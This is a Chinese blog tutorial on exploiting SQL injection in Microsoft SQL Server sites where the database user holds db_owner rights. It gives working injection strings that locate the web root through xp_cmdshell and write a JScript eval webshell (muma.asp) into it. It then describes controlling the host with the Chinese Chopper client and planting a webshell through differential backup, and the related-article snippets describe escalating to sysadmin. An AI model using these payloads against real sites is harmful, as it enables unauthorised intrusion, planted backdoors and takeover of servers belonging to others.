mssql数据库注入-dbowner权限

最新推荐文章于 2024-07-23 14:05:29 发布
最新推荐文章于 2024-07-23 14:05:29 发布
阅读量118 收藏
点赞数
分类专栏: it 文章标签: 数据库 sqlserver
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/arissa666/article/details/131830828
版权

继sa权限之后,如果查询权限是dbowner权限,最重要的是找网站物理路径,写入木马

mssql数据库注入-sa权限_arissa666的博客-CSDN博客

物理路径判断

单引号’ 看是否显示

这是能显示出来的示例

 

右键看源代码注释是否存在路径

用谷歌百度搜索

waring site:网站名.com

error site:网站名.com

中间件配置文件查找

iis一般是C:\\WINDOWS\\system32\\inetsrv\\MetaBase.xml C:\WINDOWS\system32\inetsrv\MetaBase.bin 这两个配置文件

 每一个中间件的配置文件不同apache的配置你就是http.conf

用语句判断

drop table black;create Table black(result varchar(7996) null, id int not null identity (1,1))--

先删除black表,在创建black,里面有两个字段result和id

insert into black exec master..xp_cmdshell 'dir /s c:\1.aspx'--

向black表插入语句,插入的内容是拓展程序xp_cmdshell搜索出来的1.aspx目录,dir /s是目录搜索,目录具体在哪个盘需要挨个试

black表下面就会存在刚才插入的内容

 查black里面的字段内容,id数字需要挨个尝试

and (select result from black where id=4)>0--

 

得到物理路径之后就可以写入木马

在得到的目录c:\wwwtest\iis-xxser.com--wwwroot\sqlserver\里面插入木马文件

没有插入木马之前

 

  %20;exec%20master..xp_cmdshell%20'Echo%20"<%@ Page Language="Jscript"%><%eval%20request("123")%>"%20>>%20c:\wwwtest\iis-xxser.com--wwwroot\sqlserver\muma.asp'--

通过master下面的xp_cmdshell拓展程序,写入木马,保存成文件muma.asp文件

 插入木马后目录显示

 用菜刀

 因为jscript这句报错了,所以删掉了 ,其实不用处理

右键添加木马的这个目录

打开就可以看到这个主机的文件,就可以控制网站看操作其主机文件

 

 备份差异

 用getwebshell工具,在已知的路径下面创建一个666.aspx文件

一步两步一直到一键备份

 查看文件报错

 用菜刀连接一下,可以打开宿主机

 有时候备份的时候会把数据破坏掉而失败

 

 

学海无涯一叶扁舟
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Mssql Db_owner角色注入直接获得系统权限.txt
07-18
Mssql Db_owner角色注入直接获得系统权限.txt
如何让用户只能访问特定的数据库(MSSQL)
12-14
 为了限定不同厂商的维护人员只能访问自己的数据库,现需要给各个厂商限定权限,让他们登录SQL Server只能看到授权的数据库而无法看到其他数据库。  解决方案  1.先给不同的厂商创建不同的登录名(如下以一个...
db_owner角色注入直接获得系统权限
zgqtxwd的专栏
04-26 650
<!--google_ad_client = "pub-2947489232296736";/* 728x15, 创建于 08-4-23MSDN */google_ad_slot = "3624277373";google_ad_width = 728;google_ad_height = 15;//--><script type="text/javascript"
【应用安全】mssql db_owner权限拿shell
Fly_鹏程万里
02-22 1507
如果站库同服务器,且权限为db_owner的话,那么我们可以考虑直接写入一句话。但写入一句话的前提就是知道web物理路径列出web目录。然后利用sql语句创建一个临时表然后将这个一句话插入到这个临时表再进行备份,备份成asp文件就成功得到一个一句话后门了然后连接就OK了 1.判断数据库权限 2.利用xp_dirtree查找web物理目录 如果我们用DB权限写入一句话是需要知道web目录 执...
***中遇到MSSQL:db_owner如何处理?
weixin_34148508的博客
09-22 80
在我某次的***工作中遇见的一个小问题,其权限设置时非常BT,只能在当前的目录下转悠,调用cmdshell可想而知,一般的尝试方法都将失去效应,但是它的数据库确是MSSQL权限应该不会太高 SrvRoleMember : db_owner 果然,经过查看之后发现时db_owner权限,其实大多数朋友能走到这里说明您还有足够的思路分析能力,那么我们就可以进行我们的...
msSQL注入通杀,只要有注入点就有系统权限
蓝法典的专栏
02-24 1609
不知道大家看过这篇文章没有,可以在db_owner角色下添加SYSADMIN帐号,这招真狠啊,存在MSSQL注射漏洞的服务器又要遭殃了。方法主要是利用db_owner可以修改sp_addlogin和sp_addsrvrolemember这两个存储过程,饶过了验证部分。具体方法如下:先输入drop procedure sp_addlogin,然后在IE里面输入create procedure  sp
mssql数据库注入-sa权限
arissa666的博客
07-20 287
xp_regwrite是另一个远程拓展程序,上面是用注册表远程桌面控制,开启3389,REG_DWORD如果是0就是开启,是1就是关闭。准备一个网站,mssql是微软数据库,网站后缀是asp或者aspx,权限涉及sa,dbowner,public。没报错,说明是sa权限,可以利用拓展,将权限可以换成db_owner或者public就是判断权限归属。information_schema性质类同,如果数据库的名字错误,界面会报错。master库里面执行拓展程序,创建一个test账户密码test。
注入之mssql数据库(手工注入
2301_79194110的博客
09-15 243
恢复 EXEC sp_configure 'show advanced options', 1;-- 判断当前数据库用户是否为db_owner权限。insert into black exec master..xp_cmdshell 'dir /s c:\1.aspx'-- 当前库testDB。没有xp_cmdshell。
mssql数据库和Oracle数据库注入
cangyu51462的博客
05-05 8923
mssql数据库和Oracle数据库注入
mongodb基础之用户权限管理实例教程
09-09
3. **数据库管理角色**,如 `dbAdmin`(数据库管理员)、`dbOwner`(拥有所有权限,包括读写、管理及用户管理)和 `userAdmin`(用户管理)。 4. **集群管理角色**,如 `clusterAdmin`(全集群管理权限)。 5. **...
MongoDb db.createUser用户权限
04-30
`dbOwner` 角色使用户成为数据库的所有者,拥有该数据库的所有读写权限以及用户管理权限。 总结来说,`db.createUser` 是MongoDB中用于创建用户账户并分配权限的关键方法。通过合理地设置角色,可以确保数据的安全...
分布式文档存储数据库之MongoDB访问控制的操作方法
12-14
2. **dbOwner**:具有 dbAdmin 的所有权限,同时还能管理数据库用户权限,但仅限于其所在的数据库。 3. **enableSharding**:允许用户启用分片功能。 4. **read**:用户只能读取数据库中的数据,不能进行写操作。 ...
ASP语言实现对SQL SERVER数据库的操作
01-20
- 在数据库“test”下为用户“hxl”分配“Dbowner”角色,赋予其对数据库的管理权限。 2. ODBC(Open Database Connectivity)数据源配置: - 在控制面板中设置系统DSN,选择“SQL Server”数据源,命名为“test...
MSSQL db_owner注入获得系统权限
wangmj518的专栏
12-17 731
相信大家都看过LCX大虾写的《MSSQL db_owner角色注入直接获得系统权限》吧,小弟不自量力也写写我利用MSSQL db_owner角色注入直接获得系统权限的方法。LCX大哥大致取得系统权限的思路是利用MSSQL中xp_regread的存储过程读出vnc在注册表中的密码,然后再破解,就可以拿到管理员权限。可是在网上毕竟装vnc的服务器是少数,要是一台你很想进入的服务器不装vnc,也就是说没
OAuth2.0 or Spring Session or 单点登录流程
qq_53374893的博客
07-20 341
一句话精辟解释: 在过滤器放行的时候,偷偷的把原生的 request 和 response 对象换成了它的实现,也就是 调用getSession 的时候拿到的 其实是对redis 操作的Session。但其他的操作还是使用原生的,只不过重写的方法,调用的是子类的,也就是往 redis 里放入 Session,把原生的操作给替换了!分布式Session原理,使用子域名,的时候放入父域名的 JsessionId 然后将这个ID 的所存的内容放入Redis ,这样实现不同域名共享同一sessionID.
基于JSP的高校信息资源共享平台
heye0910032的博客
07-22 533
高校信息资源共享平台的开发和实现,为高校信息资源的管理和共享提供了一个有效的解决方案。通过使用JSP技术和MySQL数据库,本系统实现了一个稳定、安全、易用的高校信息资源管理平台。虽然在开发过程中遇到了一些技术挑战,但通过不断学习和实践,最终完成了一个能够满足用户需求的系统。未来,我们将继续优化系统功能,提升用户体验,以期达到更高的应用价值和社会效益。高校信息资源共享平台的开发和实现,为高校信息资源的管理和共享提供了一个有效的解决方案。
秒杀业务: 简单梳理
最新发布
m0_59925573的博客
07-23 832
(1)在一人一单优惠券秒杀中,先是解决了因线程安全导致的超卖问题,为了满足一人一单的业务需求需要给查询订单表查询库存表上锁,但是synchronized只能满足单机环境下线程安全,在分布式环境对多个JVM需要使用分布式锁,于是手写分布式锁,但是在极端情况下,例如业务超时,会出现“误删”问题,手写锁无法解决,于是引入redisson,借助看门狗机制可以有效解决这个问题。
MySQL(事务、索引)&&MyBatis
hycccccch的博客
07-19 721
事务指的是一组操作的集合,是一个不可分割的工作单位。事务会将所有的操作作为一个整体一起向系统提交或撤销操作请求,即这些操作要么同时成功,要么同时失败默认MySQL的事务是自动提交,即当执行一条DML语句时,MySQL会立即隐式的提交事务开启事务后运行事务不会对数据改变,commit后才会改变数据如果有命令发生错误,需要进行rollback进行回滚、
(AuthenticationFailed): 'Authentication failed.
09-20
> db.createUser({user:"daniel",pwd:"123456",roles:[{role:"dbOwner",db:"good"}]}) ``` 4. 在Java代码中使用正确的账号、密码等进行连接。 请注意,以上步骤中的账号、密码等信息需要根据你的实际情况进行...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值